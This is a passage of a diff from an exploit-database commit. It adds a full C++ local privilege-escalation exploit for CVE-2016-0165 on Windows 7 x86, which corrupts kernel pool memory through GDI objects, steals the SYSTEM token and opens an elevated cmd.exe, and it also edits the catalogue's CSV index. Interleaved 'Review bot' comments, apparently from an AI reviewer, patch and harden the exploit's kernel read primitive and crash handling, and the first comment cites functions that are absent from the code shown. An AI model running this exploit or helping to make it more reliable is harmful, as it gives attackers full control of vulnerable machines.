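Review bot: In xxPointToGet the palette read is copied into the caller's buffer before its return value is checked, and the callers that use it as the kernel read primitive — xxGetTarPROCESS and xxModifyTokenPointer — ignore the FALSE return, so when GetPaletteEntries fails the caller receives uninitialised malloc() bytes and xxGetTarPROCESS treats them as the next EPROCESS link and aims the write primitive at it; the check has to precede the memcpy, and the walk should stop on failure, e.g. `if (!xxPointToGet(point + off_EPROCESS_UniqueProId, &value, sizeof(DWORD_PTR)) || value == 0x00) break;`. A second weak spot is xxGetSysPROCESS, which computes the PsInitialSystemProcess RVA from a hard-coded "ntkrnlpa.exe" while xxGetNtoskrnlAddress takes whatever EnumDeviceDrivers lists first, and checks neither LoadLibraryA nor GetProcAddress for NULL; on a Windows 7 x86 install whose kernel runs as ntoskrnl.exe (PAE disabled) the RVA is taken from the wrong image and the first kernel read lands at a bogus address, so the name should be derived from the base actually used with GetDeviceDriverBaseNameA (psapi, already linked via the pragma). The rewritten tails of both functions are below. Anyone running this should also note that the cleanup at the end of POC_CVE20170101 (DeleteObject/UnregisterClassA) executes even when a check fails after PolyPatBlt has already corrupted the pool, so a failed hunt is likely to bugcheck rather than exit cleanly.
```cpp
static
BOOL xxPointToGet(LONG addr, PVOID pvBits, DWORD cb)
{
    // … unchanged: redirect the extend palette's colour table at addr via SetBitmapBits …
    UINT cbSize = (cb + 3) & ~3; // sizeof(PALETTEENTRY) => 4
    PVOID pvTable = malloc(cbSize);
    if (pvTable == NULL)
    {
        return FALSE;
    }
    UINT cRead = GetPaletteEntries(hPalExtend, 0, cbSize / 4, (PPALETTEENTRY)pvTable);
    if (cRead < cbSize / 4)
    {
        free(pvTable); // never hand uninitialised bytes back to the caller
        return FALSE;
    }
    memcpy(pvBits, pvTable, cb);
    free(pvTable);
    return TRUE;
}

static
DWORD_PTR
xxGetSysPROCESS(VOID)
{
    DWORD_PTR KernelBase = xxGetNtoskrnlAddress();
    CHAR szKernel[MAX_PATH] = { 0 };
    // resolve the RVA against the image that is actually loaded, not a guessed name
    if (KernelBase == 0x00 ||
        !GetDeviceDriverBaseNameA((LPVOID)KernelBase, szKernel, sizeof(szKernel)))
    {
        return 0x00;
    }
    HMODULE hKernel = LoadLibraryA(szKernel);
    if (hKernel == NULL)
    {
        return 0x00;
    }
    FARPROC pfn = GetProcAddress(hKernel, "PsInitialSystemProcess");
    DWORD_PTR NtAddr = pfn ? KernelBase + ((DWORD_PTR)pfn - (DWORD_PTR)hKernel) : 0x00;
    FreeLibrary(hKernel);
    if (NtAddr == 0x00)
    {
        return 0x00;
    }
    // … unchanged: xxPointToGet(NtAddr, &NtAddr, sizeof(DWORD_PTR)) and the return …
}
```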
@@ -0,0 +1,663 @@ +#include +#include +#include +#include +#pragma comment(lib, "psapi.lib") + +#define POCDEBUG 0 + +#if POCDEBUG == 1 +#define POCDEBUG_BREAK() getchar() +#elif POCDEBUG == 2 +#define POCDEBUG_BREAK() DebugBreak() +#else +#define POCDEBUG_BREAK() +#endif + +static HBITMAP hBmpHunted = NULL; +static HBITMAP hBmpExtend = NULL; +static DWORD iMemHunted = NULL; +static PDWORD pBmpHunted = NULL; +CONST LONG maxCount = 0x6666667; +CONST LONG maxLimit = 0x04E2000; +CONST LONG maxTimes = 4000; +CONST LONG tmpTimes = 5500; +static POINT point[maxCount] = { 0, 0 }; +static HBITMAP hbitmap[maxTimes] = { NULL }; +static HACCEL hacctab[tmpTimes] = { NULL }; +CONST LONG iExtHeight = 948; +CONST LONG iExtpScan0 = 951; + +static +VOID +xxCreateClipboard(DWORD Size) +{ + PBYTE Buffer = (PBYTE)malloc(Size); + FillMemory(Buffer, Size, 0x41); + Buffer[Size - 1] = 0x00; + HGLOBAL hMem = GlobalAlloc(GMEM_MOVEABLE, (SIZE_T)Size); + CopyMemory(GlobalLock(hMem), Buffer, (SIZE_T)Size); + GlobalUnlock(hMem); + SetClipboardData(CF_TEXT, hMem); +} + +static +BOOL xxPoint(LONG id, DWORD Value) +{ + LONG iLeng = 0x00; + pBmpHunted[id] = Value; + iLeng = SetBitmapBits(hBmpHunted, 0x1000, pBmpHunted); + if (iLeng < 0x1000) + { + return FALSE; + } + return TRUE; +} + +static +BOOL xxPointToHit(LONG addr, PVOID pvBits, DWORD cb) +{ + LONG iLeng = 0; + pBmpHunted[iExtpScan0] = addr; + iLeng = SetBitmapBits(hBmpHunted, 0x1000, pBmpHunted); + if (iLeng < 0x1000) + { + return FALSE; + } + iLeng = SetBitmapBits(hBmpExtend, cb, pvBits); + if (iLeng < (LONG)cb) + { + return FALSE; + } + return TRUE; +} + +static +BOOL xxPointToGet(LONG addr, PVOID pvBits, DWORD cb) +{ + LONG iLeng = 0; + pBmpHunted[iExtpScan0] = addr; + iLeng = SetBitmapBits(hBmpHunted, 0x1000, pBmpHunted); + if (iLeng < 0x1000) + { + return FALSE; + } + iLeng = GetBitmapBits(hBmpExtend, cb, pvBits); + if (iLeng < (LONG)cb) + { + return FALSE; + } + return TRUE; +} + +static +VOID xxInitPoints(VOID) +{ + for (LONG i = 0; 
i < maxCount; i++) + { + point[i].x = (i % 2) + 1; + point[i].y = 100; + } + for (LONG i = 0; i < 75; i++) + { + point[i].y = i + 1; + } +} + +static +BOOL xxDrawPolyLines(HDC hdc) +{ + for (LONG i = maxCount; i > 0; i -= min(maxLimit, i)) + { + // std::cout << ":" << (PVOID)i << std::endl; + if (!PolylineTo(hdc, &point[maxCount - i], min(maxLimit, i))) + { + return FALSE; + } + } + return TRUE; +} + +static +BOOL xxCreateBitmaps(INT nWidth, INT Height, UINT nbitCount) +{ + POCDEBUG_BREAK(); + for (LONG i = 0; i < maxTimes; i++) + { + hbitmap[i] = CreateBitmap(nWidth, Height, 1, nbitCount, NULL); + if (hbitmap[i] == NULL) + { + return FALSE; + } + } + return TRUE; +} + +static +BOOL xxCreateAcceleratorTables(VOID) +{ + POCDEBUG_BREAK(); + for (LONG i = 0; i < tmpTimes; i++) + { + ACCEL acckey[0x0D] = { 0 }; + hacctab[i] = CreateAcceleratorTableA(acckey, 0x0D); + if (hacctab[i] == NULL) + { + return FALSE; + } + } + return TRUE; +} + +static +BOOL xxDeleteBitmaps(VOID) +{ + BOOL bReturn = FALSE; + POCDEBUG_BREAK(); + for (LONG i = 0; i < maxTimes; i++) + { + bReturn = DeleteObject(hbitmap[i]); + hbitmap[i] = NULL; + } + return bReturn; +} + +static +VOID xxCreateClipboards(VOID) +{ + POCDEBUG_BREAK(); + for (LONG i = 0; i < maxTimes; i++) + { + xxCreateClipboard(0xB5C); + } +} + +static +BOOL xxDigHoleInAcceleratorTables(LONG b, LONG e) +{ + BOOL bReturn = FALSE; + for (LONG i = b; i < e; i++) + { + bReturn = DestroyAcceleratorTable(hacctab[i]); + hacctab[i] = NULL; + } + return bReturn; +} + +static +VOID xxDeleteAcceleratorTables(VOID) +{ + for (LONG i = 0; i < tmpTimes; i++) + { + if (hacctab[i] == NULL) + { + continue; + } + DestroyAcceleratorTable(hacctab[i]); + hacctab[i] = NULL; + } +} + +static +BOOL xxRetrieveBitmapBits(VOID) +{ + pBmpHunted = static_cast(malloc(0x1000)); + ZeroMemory(pBmpHunted, 0x1000); + LONG index = -1; + LONG iLeng = -1; + POCDEBUG_BREAK(); + for (LONG i = 0; i < maxTimes; i++) + { + iLeng = GetBitmapBits(hbitmap[i], 0x1000, 
pBmpHunted); + if (iLeng < 0x2D0) + { + continue; + } + index = i; + std::cout << "LOCATE: " << '[' << i << ']' << hbitmap[i] << std::endl; + hBmpHunted = hbitmap[i]; + break; + } + if (index == -1) + { + std::cout << "FAILED: " << (PVOID)(-1) << std::endl; + return FALSE; + } + return TRUE; +} + +static +BOOL xxGetExtendPalette(VOID) +{ + PVOID pBmpExtend = malloc(0x1000); + LONG index = -1; + POCDEBUG_BREAK(); + for (LONG i = 0; i < maxTimes; i++) + { + if (hbitmap[i] == hBmpHunted) + { + continue; + } + if (GetBitmapBits(hbitmap[i], 0x1000, pBmpExtend) < 0x2D0) + { + continue; + } + index = i; + std::cout << "LOCATE: " << '[' << i << ']' << hbitmap[i] << std::endl; + hBmpExtend = hbitmap[i]; + break; + } + free(pBmpExtend); + pBmpExtend = NULL; + if (index == -1) + { + std::cout << "FAILED: " << (PVOID)(-1) << std::endl; + return FALSE; + } + return TRUE; +} + +static +VOID xxOutputBitmapBits(VOID) +{ + POCDEBUG_BREAK(); + for (LONG i = 0; i < 0x1000 / sizeof(DWORD); i++) + { + std::cout << '['; + std::cout.fill('0'); + std::cout.width(4); + std::cout << i << ']' << (PVOID)pBmpHunted[i]; + if (((i + 1) % 4) != 0) + { + std::cout << " "; + } + else + { + std::cout << std::endl; + } + } + std::cout.width(0); +} + +static +BOOL xxFixHuntedPoolHeader(VOID) +{ + DWORD szInputBit[0x100] = { 0 }; + CONST LONG iTrueCbdHead = 205; + CONST LONG iTrueBmpHead = 937; + szInputBit[0] = pBmpHunted[iTrueCbdHead + 0]; + szInputBit[1] = pBmpHunted[iTrueCbdHead + 1]; + BOOL bReturn = FALSE; + bReturn = xxPointToHit(iMemHunted + 0x000, szInputBit, 0x08); + if (!bReturn) + { + return FALSE; + } + szInputBit[0] = pBmpHunted[iTrueBmpHead + 0]; + szInputBit[1] = pBmpHunted[iTrueBmpHead + 1]; + bReturn = xxPointToHit(iMemHunted + 0xb70, szInputBit, 0x08); + if (!bReturn) + { + return FALSE; + } + return TRUE; +} + +static +BOOL xxFixHuntedBitmapObject(VOID) +{ + DWORD szInputBit[0x100] = { 0 }; + szInputBit[0] = (DWORD)hBmpHunted; + BOOL bReturn = FALSE; + bReturn = 
xxPointToHit(iMemHunted + 0xb78, szInputBit, 0x04); + if (!bReturn) + { + return FALSE; + } + bReturn = xxPointToHit(iMemHunted + 0xb8c, szInputBit, 0x04); + if (!bReturn) + { + return FALSE; + } + return TRUE; +} + +static +DWORD_PTR +xxGetNtoskrnlAddress(VOID) +{ + DWORD_PTR AddrList[500] = { 0 }; + DWORD cbNeeded = 0; + EnumDeviceDrivers((LPVOID *)&AddrList, sizeof(AddrList), &cbNeeded); + return AddrList[0]; +} + +static +DWORD_PTR +xxGetSysPROCESS(VOID) +{ + DWORD_PTR Module = 0x00; + DWORD_PTR NtAddr = 0x00; + Module = (DWORD_PTR)LoadLibraryA("ntkrnlpa.exe"); + NtAddr = (DWORD_PTR)GetProcAddress((HMODULE)Module, "PsInitialSystemProcess"); + FreeLibrary((HMODULE)Module); + NtAddr = NtAddr - Module; + Module = xxGetNtoskrnlAddress(); + if (Module == 0x00) + { + return 0x00; + } + NtAddr = NtAddr + Module; + if (!xxPointToGet(NtAddr, &NtAddr, sizeof(DWORD_PTR))) + { + return 0x00; + } + return NtAddr; +} + +CONST LONG off_EPROCESS_UniqueProId = 0x0b4; +CONST LONG off_EPROCESS_ActiveLinks = 0x0b8; + +static +DWORD_PTR +xxGetTarPROCESS(DWORD_PTR SysPROC) +{ + if (SysPROC == 0x00) + { + return 0x00; + } + DWORD_PTR point = SysPROC; + DWORD_PTR value = 0x00; + do + { + value = 0x00; + xxPointToGet(point + off_EPROCESS_UniqueProId, &value, sizeof(DWORD_PTR)); + if (value == 0x00) + { + break; + } + if (value == GetCurrentProcessId()) + { + return point; + } + value = 0x00; + xxPointToGet(point + off_EPROCESS_ActiveLinks, &value, sizeof(DWORD_PTR)); + if (value == 0x00) + { + break; + } + point = value - off_EPROCESS_ActiveLinks; + if (point == SysPROC) + { + break; + } + } while (TRUE); + return 0x00; +} + +CONST LONG off_EPROCESS_Token = 0x0f8; +static DWORD_PTR dstToken = 0x00; +static DWORD_PTR srcToken = 0x00; + +static +BOOL +xxModifyTokenPointer(DWORD_PTR dstPROC, DWORD_PTR srcPROC) +{ + if (dstPROC == 0x00 || srcPROC == 0x00) + { + return FALSE; + } + // get target process original token pointer + xxPointToGet(dstPROC + off_EPROCESS_Token, &dstToken, 
sizeof(DWORD_PTR)); + if (dstToken == 0x00) + { + return FALSE; + } + // get system process token pointer + xxPointToGet(srcPROC + off_EPROCESS_Token, &srcToken, sizeof(DWORD_PTR)); + if (srcToken == 0x00) + { + return FALSE; + } + // modify target process token pointer to system + xxPointToHit(dstPROC + off_EPROCESS_Token, &srcToken, sizeof(DWORD_PTR)); + // just test if the modification is successful + DWORD_PTR tmpToken = 0x00; + xxPointToGet(dstPROC + off_EPROCESS_Token, &tmpToken, sizeof(DWORD_PTR)); + if (tmpToken != srcToken) + { + return FALSE; + } + return TRUE; +} + +static +BOOL +xxRecoverTokenPointer(DWORD_PTR dstPROC, DWORD_PTR srcPROC) +{ + if (dstPROC == 0x00 || srcPROC == 0x00) + { + return FALSE; + } + if (dstToken == 0x00 || srcToken == 0x00) + { + return FALSE; + } + // recover the original token pointer to target process + xxPointToHit(dstPROC + off_EPROCESS_Token, &dstToken, sizeof(DWORD_PTR)); + return TRUE; +} + +static +VOID xxCreateCmdLineProcess(VOID) +{ + STARTUPINFO si = { sizeof(si) }; + PROCESS_INFORMATION pi = { 0 }; + si.dwFlags = STARTF_USESHOWWINDOW; + si.wShowWindow = SW_SHOW; + WCHAR wzFilePath[MAX_PATH] = { L"cmd.exe" }; + BOOL bReturn = CreateProcessW(NULL, wzFilePath, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi); + if (bReturn) CloseHandle(pi.hThread), CloseHandle(pi.hProcess); +} + +static +VOID xxPrivilegeElevation(VOID) +{ + BOOL bReturn = FALSE; + do + { + DWORD SysPROC = 0x0; + DWORD TarPROC = 0x0; + POCDEBUG_BREAK(); + SysPROC = xxGetSysPROCESS(); + if (SysPROC == 0x00) + { + break; + } + std::cout << "SYSTEM PROCESS: " << (PVOID)SysPROC << std::endl; + POCDEBUG_BREAK(); + TarPROC = xxGetTarPROCESS(SysPROC); + if (TarPROC == 0x00) + { + break; + } + std::cout << "TARGET PROCESS: " << (PVOID)TarPROC << std::endl; + POCDEBUG_BREAK(); + bReturn = xxModifyTokenPointer(TarPROC, SysPROC); + if (!bReturn) + { + break; + } + std::cout << "MODIFIED TOKEN TO SYSTEM!" 
<< std::endl; + std::cout << "CREATE NEW CMDLINE PROCESS..." << std::endl; + POCDEBUG_BREAK(); + xxCreateCmdLineProcess(); + POCDEBUG_BREAK(); + std::cout << "RECOVER TOKEN..." << std::endl; + bReturn = xxRecoverTokenPointer(TarPROC, SysPROC); + if (!bReturn) + { + break; + } + bReturn = TRUE; + } while (FALSE); + if (!bReturn) + { + std::cout << "FAILED" << std::endl; + } +} + +INT POC_CVE20160165(VOID) +{ + std::cout << "-------------------" << std::endl; + std::cout << "POC - CVE-2016-0165" << std::endl; + std::cout << "-------------------" << std::endl; + + BOOL bReturn = FALSE; + + do + { + std::cout << "INIT POINTS..." << std::endl; + xxInitPoints(); + + HDC hdc = GetDC(NULL); + std::cout << "GET DEVICE CONTEXT: " << hdc << std::endl; + if (hdc == NULL) + { + bReturn = FALSE; + break; + } + + std::cout << "BEGIN DC PATH..." << std::endl; + bReturn = BeginPath(hdc); + if (!bReturn) + { + break; + } + + std::cout << "DRAW POLYLINES..." << std::endl; + bReturn = xxDrawPolyLines(hdc); + if (!bReturn) + { + break; + } + + std::cout << "ENDED DC PATH..." << std::endl; + bReturn = EndPath(hdc); + if (!bReturn) + { + break; + } + + std::cout << "CREATE BITMAPS (1)..." << std::endl; + bReturn = xxCreateBitmaps(0xE34, 0x01, 8); + if (!bReturn) + { + break; + } + + std::cout << "CREATE ACCTABS (1)..." << std::endl; + bReturn = xxCreateAcceleratorTables(); + if (!bReturn) + { + break; + } + + std::cout << "DELETE BITMAPS (1)..." << std::endl; + xxDeleteBitmaps(); + + std::cout << "CREATE CLIPBDS (1)..." << std::endl; + xxCreateClipboards(); + + std::cout << "CREATE BITMAPS (2)..." << std::endl; + bReturn = xxCreateBitmaps(0x01, 0xB1, 32); + + std::cout << "DELETE ACCTABS (H)..." << std::endl; + xxDigHoleInAcceleratorTables(2000, 4000); + + std::cout << "PATH TO REGION..." << std::endl; + POCDEBUG_BREAK(); + HRGN hrgn = PathToRegion(hdc); + if (hrgn == NULL) + { + bReturn = FALSE; + break; + } + std::cout << "DELETE REGION..." 
<< std::endl;
+ DeleteObject(hrgn);
+
+ std::cout << "LOCATE HUNTED BITMAP..." << std::endl;
+ bReturn = xxRetrieveBitmapBits();
+ if (!bReturn)
+ {
+ break;
+ }
+
+ // std::cout << "OUTPUT BITMAP BITS..." << std::endl;
+ // xxOutputBitmapBits();
+
+ std::cout << "MODIFY EXTEND BITMAP HEIGHT..." << std::endl;
+ POCDEBUG_BREAK();
+ bReturn = xxPoint(iExtHeight, 0xFFFFFFFF);
+ if (!bReturn)
+ {
+ break;
+ }
+
+ std::cout << "LOCATE EXTEND BITMAP..." << std::endl;
+ bReturn = xxGetExtendPalette();
+ if (!bReturn)
+ {
+ break;
+ }
+
+ if ((pBmpHunted[iExtpScan0] & 0xFFF) != 0x00000CCC)
+ {
+ bReturn = FALSE;
+ std::cout << "FAILED: " << (PVOID)pBmpHunted[iExtpScan0] << std::endl;
+ break;
+ }
+ iMemHunted = (pBmpHunted[iExtpScan0] & ~0xFFF) - 0x1000;
+ std::cout << "HUNTED PAGE: " << (PVOID)iMemHunted << std::endl;
+ std::cout << "FIX HUNTED POOL HEADER..." << std::endl;
+ bReturn = xxFixHuntedPoolHeader();
+ if (!bReturn)
+ {
+ break;
+ }
+
+ std::cout << "FIX HUNTED BITMAP OBJECT..." << std::endl;
+ bReturn = xxFixHuntedBitmapObject();
+ if (!bReturn)
+ {
+ break;
+ }
+
+ std::cout << "-------------------" << std::endl;
+ std::cout << "PRIVILEGE ELEVATION" << std::endl;
+ std::cout << "-------------------" << std::endl;
+ xxPrivilegeElevation();
+ std::cout << "-------------------" << std::endl;
+
+ std::cout << "DELETE BITMAPS (2)..." << std::endl;
+ xxDeleteBitmaps();
+
+ std::cout << "DELETE ACCTABS (3)..." << std::endl;
+ xxDeleteAcceleratorTables();
+ bReturn = TRUE;
+ } while (FALSE);
+
+ if (!bReturn)
+ {
+ std::cout << GetLastError() << std::endl;
+ }
+ std::cout << "-------------------" << std::endl;
+ getchar();
+ return 0;
+}
+
+INT main(INT argc, CHAR *argv[])
+{
+ POC_CVE20160165();
+ return 0;
+}
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 1a3824d40..b411eb0c0 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
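Review bot: The second bitmap spray in POC_CVE20160165, `bReturn = xxCreateBitmaps(0x01, 0xB1, 32);`, is the only step whose result is not tested before moving on — every neighbouring step is followed by `if (!bReturn) { break; }` — so if any of the 4000 CreateBitmap calls fails, the accelerator-table hole punching and the PathToRegion overflow still run against a pool layout that is not the one the hard-coded offsets (0xCCC, 0xb70, 0xb78, 0xb8c) assume, which with this kind of overflow most likely means a bugcheck rather than the clean FAILED path; add the same guard directly after that call. xxGetSysPROCESS has the same weakness as its twin in 44479.cpp: the PsInitialSystemProcess RVA comes from a hard-coded "ntkrnlpa.exe" while the base comes from the first EnumDeviceDrivers entry, and neither LoadLibraryA nor GetProcAddress is checked for NULL, so on a kernel loaded as ntoskrnl.exe the first arbitrary read goes to a bogus address; resolve the name with GetDeviceDriverBaseNameA on that base (psapi is already linked) and bail out on a NULL handle or export. xxCreateClipboard also never checks the SetClipboardData return, frees neither Buffer nor, on failure, hMem, and is called without any visible OpenClipboard/CloseClipboard pairing, so a clipboard spray that silently fails is indistinguishable from one that worked; at minimum count the successful calls in xxCreateClipboards and abort the run if the count falls short of maxTimes.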
@@ -9657,6 +9657,12 @@ id,file,description,date,author,type,platform,port
 44452,exploits/linux/local/44452.py,"GNU Beep 1.3 - 'HoleyBeep' Local Privilege Escalation",2018-04-06,Pirhack,local,linux,
 44455,exploits/windows/local/44455.py,"SysGauge Pro 4.6.12 - Local Buffer Overflow (SEH)",2018-04-16,"Hashim Jawad",local,windows,
 44470,exploits/windows/local/44470.py,"CloudMe Sync 1.11.0 - Local Buffer Overflow",2018-04-16,"Prasenjit Kanti Paul",local,windows,
+44474,exploits/windows/local/44474.txt,"Brave Browser < 0.13.0 - 'long alert() argument' Denial of Service",2018-04-17,"Sahil Tikoo",local,windows,
+44475,exploits/windows/local/44475.txt,"Brave Browser < 0.13.0 - 'window.close(self)' Denial of Service",2018-04-17,"Sahil Tikoo",local,windows,
+44476,exploits/windows/local/44476.py,"AMD Plays.tv 1.27.5.0 - 'plays_service.exe' Arbitrary File Execution",2018-04-15,Securifera,local,windows,
+44478,exploits/windows_x86/local/44478.cpp,"Microsoft Window Manager (Windows 7 x86) - Menu Management Component UAF Privilege Elevation",2018-03-26,xiaodaozhi,local,windows_x86,
+44479,exploits/windows_x86/local/44479.cpp,"Microsoft Windows Kernel (Windows 7 x86) - Local Privilege Escalation (MS17-017)",2018-03-15,xiaodaozhi,local,windows_x86,
+44480,exploits/windows_x86/local/44480.cpp,"Microsoft Windows Kernel (Windows 7 x86) - Local Privilege Escalation (MS16-039)",2018-03-01,xiaodaozhi,local,windows_x86,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -16406,6 +16412,8 @@ id,file,description,date,author,type,platform,port
 44415,exploits/android/remote/44415.txt,"LineageOS 14.1 Blueborne - Remote Code Execution",2018-04-06,"Marcin Kozlowski",remote,android,
 44446,exploits/hardware/remote/44446.py,"F5 BIG-IP 11.6 SSL Virtual Server - 'Ticketbleed' Memory Disclosure",2017-02-14,@0x00string,remote,hardware,
 44453,exploits/windows/remote/44453.md,"Microsoft Credential Security Support Provider - Remote Code Execution",2018-04-13,Preempt,remote,windows,
+44473,exploits/hardware/remote/44473.txt,"D-Link DIR-615 Wireless Router - Persistent Cross Site Scripting",2018-04-17,"Sayan Chatterjee",remote,hardware,
+44482,exploits/php/remote/44482.rb,"Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit)",2018-04-17,"José Ignacio Rojo",remote,php,80
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -39159,8 +39167,9 @@ id,file,description,date,author,type,platform,port
 44443,exploits/php/webapps/44443.txt,"WordPress Plugin File Upload 4.3.2 - Stored Cross-Site Scripting",2018-04-10,ManhNho,webapps,php,
 44444,exploits/php/webapps/44444.txt,"WordPress Plugin File Upload 4.3.3 - Stored Cross-Site Scripting (PoC)",2018-04-10,ManhNho,webapps,php,
 44447,exploits/php/webapps/44447.txt,"Joomla Convert Forms version 2.0.3 - Formula Injection (CSV Injection)",2018-04-12,"Sairam Jetty",webapps,php,
-44448,exploits/php/webapps/44448.py,"Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC)",2018-04-13,"Vitalii Rudnykh",webapps,php,
+44448,exploits/php/webapps/44448.py,"Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC)",2018-04-13,"Vitalii Rudnykh",webapps,php,
 44450,exploits/linux/webapps/44450.txt,"MikroTik 6.41.4 - FTP daemon Denial of Service PoC",2018-04-13,FarazPajohan,webapps,linux,
-44449,exploits/php/webapps/44449.rb,"Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution",2018-04-13,"Hans Topo",webapps,php,
+44449,exploits/php/webapps/44449.rb,"Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution",2018-04-13,"Hans Topo & g0tmi1k",webapps,php,
 44454,exploits/php/webapps/44454.txt,"Cobub Razor 0.8.0 - SQL injection",2018-04-16,Kyhvedn,webapps,php,80
 44469,exploits/jsp/webapps/44469.txt,"Sophos Cyberoam UTM CR25iNG - 10.6.3 MR-5 - Direct Object Reference",2018-04-16,Frogy,webapps,jsp,
+44471,exploits/php/webapps/44471.txt,"Joomla! Component jDownloads 3.2.58 - Cross Site Scripting",2018-04-17,"Sureshbabu Narvaneni",webapps,php,